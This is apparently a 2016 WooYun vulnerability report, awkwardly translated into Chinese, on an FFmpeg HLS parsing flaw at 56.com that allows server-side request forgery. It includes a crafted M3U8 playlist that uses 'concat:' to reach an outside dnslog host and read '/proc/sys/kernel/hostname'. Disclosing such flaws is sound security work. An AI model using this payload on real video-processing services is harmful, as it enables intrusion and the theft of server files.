漏洞标题 56视频FFmpeg解析漏洞导致SSRF 相关制造商 56.com 漏洞作者 Sanwenkit 提交时间 2016-05-06 16: 23 公共时间 2016-06-20 19: 40 漏洞类型 应用配置错误 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 FFmpeg的 漏洞详细信息 构建恶意视频负载。由于56个视频的文件大小要求最低,因此可以填充任何内容: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://pictest.66ae2b.dnslog.info | file: ///proc/sys/kernel/hostname #EXT-X-ENDLIST . 上传视频并让服务器对其进行解码:
漏洞证明: 在解码过程中解析漏洞会导致SSRF cloudeye日志如下:
修理计划: 简直无法阻止.. 版权声明:请注明出处sanwenkit @乌云